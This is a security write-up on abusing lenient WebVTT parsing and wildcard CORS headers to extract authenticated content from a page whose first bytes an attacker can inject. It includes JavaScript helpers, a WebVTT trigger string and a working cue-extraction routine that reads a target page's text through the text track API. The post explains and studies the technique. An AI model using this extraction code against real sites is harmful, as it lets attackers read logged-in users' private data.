Abusing WebVTT and CORS for fun and profit

WebVTT is a way for HTML5 developers to display and cue text as subtitles for video. The grammar for WebVTT is pretty simple and, as we know, browsers are always willing to forgive "weird" looking input in an effort to give users a best-effort experience. This post looks at ways to take advantage of WebVTT in some attack contexts in order to extract information or perform general DOM abuse.


Video tags can make use of subtitle files, as follows:
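A minimal sketch of such markup, generated from JavaScript. The file names and the buildVideoMarkup helper are placeholders for illustration, not values from a real deployment:

```javascript
// Build the markup for a <video> element that loads a WebVTT subtitle track.
// Inputs are assumed to be trusted; no attribute escaping is performed here.
function buildVideoMarkup(videoSrc, vttSrc) {
  return [
    '<video controls>',
    `  <source src="${videoSrc}" type="video/mp4">`,
    `  <track kind="subtitles" src="${vttSrc}" srclang="en" label="English" default>`,
    '</video>',
  ].join('\n');
}

// Placeholder file names, for illustration only.
console.log(buildVideoMarkup('movie.mp4', 'subtitles.vtt'));
```

The track element is what matters for the rest of this post: its src attribute is the URL the browser fetches and parses as WebVTT.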

WebVTT (subtitle) files need to follow this format:

The file merely describes cues, and lets you number them and give each one a start and end time. Timestamps specify hours (hh), minutes (mm), seconds (ss) and milliseconds (ttt). From my basic inspection of the grammar, most browsers require you to fill every digit of a field once you use it. For instance, if you want to indicate hours you need to use both digits, and the same goes for the other fields. You must include the "-->" between the start and end timestamps.
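As a rough illustration, here is a small sample file held in a string, together with a regular expression that checks cue timing lines. The sample cues and the isCueTiming helper are made up for this sketch, and the pattern is stricter than what browsers actually accept:

```javascript
// A small WebVTT file: the signature line, a blank line, then numbered cues.
const sampleVtt = [
  'WEBVTT',
  '',
  '1',
  '00:00:01.000 --> 00:00:04.000',
  'First subtitle line',
  '',
  '2',
  '00:05.000 --> 00:09.500',
  'Hours are optional, so this cue uses mm:ss.ttt',
].join('\n');

// [hh:]mm:ss.ttt, where every field that is present uses its full width.
const TIMESTAMP = String.raw`(?:\d{2,}:)?[0-5]\d:[0-5]\d\.\d{3}`;

// start timestamp, whitespace, "-->", whitespace, end timestamp.
const CUE_TIMING = new RegExp(`^(${TIMESTAMP})[ \\t]+-->[ \\t]+(${TIMESTAMP})`);

// True when the line looks like a cue timing line.
function isCueTiming(line) {
  return CUE_TIMING.test(line);
}

// Print only the timing lines found in the sample file.
console.log(sampleVtt.split('\n').filter(isCueTiming));
```

A line such as "0:5.0 --> 0:9.5" fails this check because the fields are not padded to their full width.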

Grammar Quirks

The grammar is not extremely strict, and you can get away with a lot. Here's a quick summary of some of the things I've noticed for Safari, Chrome and Firefox:

  • The file must start with "WEBVTT"
  • It doesn't matter what comes after the first few bytes (described above)
  • Numbering cues is optional; the browser usually just fills an array with the cues.
  • Just about anything after the timestamp is considered part of the cue until another one is specified.
  • It doesn't matter what the content type of the subtitle file is 
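The quirks above can be modelled with a deliberately forgiving toy parser. This is only a sketch of the observed behaviour, not the parsing algorithm any browser implements; parseLoosely is a hypothetical helper, and it assumes a cue's text runs until a blank line or the next timing line:

```javascript
// Toy model of the lenient behaviour listed above. Returns an array of
// { timing, text } objects, or null when the input is rejected outright.
function parseLoosely(text) {
  // The file must start with "WEBVTT"; nothing else is checked up front.
  if (!text.startsWith('WEBVTT')) return null;

  const cues = [];
  let current = null;

  // Whatever else sits on the first line is ignored.
  for (const line of text.split(/\r?\n/).slice(1)) {
    if (line.trim() === '') {
      current = null; // a blank line closes the current cue
    } else if (line.includes('-->')) {
      // A timing line starts a new cue; no cue number is required.
      current = { timing: line.trim(), text: '' };
      cues.push(current);
    } else if (current) {
      // Anything else after a timing line becomes cue text.
      current.text += (current.text ? '\n' : '') + line;
    }
    // Lines outside a cue (such as cue numbers) are skipped.
  }
  return cues;
}

const parsed = parseLoosely('WEBVTT junk\n\n00:00.000 --> 00:10.000\n<p>not really a subtitle</p>');
console.log(parsed);
```

Note that the function only ever looks at the text, which mirrors the last point: the declared content type plays no part in the decision.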

Extraction Attacks

So now that we know what we can and can't do with the grammar, let's see how we can abuse this. Here's the attack context:

  1. A server hosts some authenticated content that only a logged-in user can access, under that user's access rights.
  2. An attacker wants to extract this content, but needs to do so under the mentioned user's access rights.
  3. The user is free to visit any arbitrary page and the attacker is on a remote network.
  4. The host web server sends a cross-origin header like this: "Access-Control-Allow-Origin: *"
  5. The web server hosts a page that suffers from an injection vulnerability allowing the attacker to specify the first few bytes of the page.

This is, for all intents and purposes, the same attack context as a CSRF vulnerability, and it abuses the same mechanism in the browser that a CSRF attack does. Point number 4 is the kicker: should any JavaScript, JSON, or other arbitrary content harbor secrets in such a way that the attacker can inject into the first few bytes, there is a way to extract these secrets using WebVTT.

Straight Extraction Attack

Here's the basic attack idea: the attacker loads the injectable page in such a way that it is interpreted as a WebVTT file. Here's a demo:
The trigger (as seen above) looks like this:


If this is inserted into the first few bytes of the page it will force it to be rendered as follows:
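A trigger of this kind could be sketched as below. The exact bytes are an assumption (a signature line, a blank line and one long-running cue timing line), and reflectedResponse is a hypothetical stand-in for the vulnerable page, which is assumed to echo attacker input at the very start of its response:

```javascript
// Hypothetical trigger: signature, blank line, then a single cue timing line.
const TRIGGER = 'WEBVTT\n\n00:00:00.000 --> 01:00:00.000\n';

// Stand-in for a vulnerable page that reflects input before its own body.
function reflectedResponse(injected, pageBody) {
  return injected + pageBody;
}

// The page body here is made-up content standing in for a real secret.
const response = reflectedResponse(TRIGGER, '<html><body>token=SECRET</body></html>');
console.log(response);

// If the injection point were a query-string parameter (an assumption),
// the newlines would need to be percent-encoded before delivery.
console.log(encodeURIComponent(TRIGGER));
```

Everything the page emits after the timing line, including the markup that carries the secret, now sits where a subtitle parser expects cue text.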

This forces the browser to interpret the response as a valid WebVTT file, with the HTML content as the subtitle text. Here's where the magic comes in: most browsers have a JavaScript API for accessing the actual text in the cues. Here's a quick demo of extracting the first cue's text:
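A minimal sketch of reading cue text through the text track API follows. The helper names, the target URL and the crossOrigin parameter are assumptions for illustration; which crossorigin setting is needed depends on how the target serves its CORS headers:

```javascript
// Return the text of the first cue of a TextTrack-like object, or null.
function firstCueText(track) {
  const cues = track && track.cues;
  return cues && cues.length > 0 ? cues[0].text : null;
}

// Browser-only: attach a <track> pointing at targetUrl to a <video> element
// and hand the first cue's text to onText once the track has loaded.
function extractFromUrl(targetUrl, onText, crossOrigin) {
  const video = document.createElement('video');
  if (crossOrigin) video.crossOrigin = crossOrigin; // e.g. 'anonymous'

  const trackEl = document.createElement('track');
  trackEl.kind = 'subtitles';
  trackEl.src = targetUrl;
  trackEl.addEventListener('load', () => onText(firstCueText(trackEl.track)));

  video.appendChild(trackEl);
  document.body.appendChild(video);

  // Cues are only fetched and parsed once the track is not "disabled".
  trackEl.track.mode = 'hidden';
}

// Hypothetical usage from an attacker-controlled page:
// extractFromUrl('https://target.example/injectable?x=...', (text) => console.log(text), 'anonymous');
```

Keeping the cue lookup in its own function makes it usable with any object that exposes a cues list, including video.textTracks[0] on an existing player.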

And here's a screenshot of me using this trick to demonstrate that it could work against HTTP headers (random arbitrary content), should I be able to inject the WEBVTT preamble as discussed above (the screenshot shows Safari and Firefox):

Further Reading and References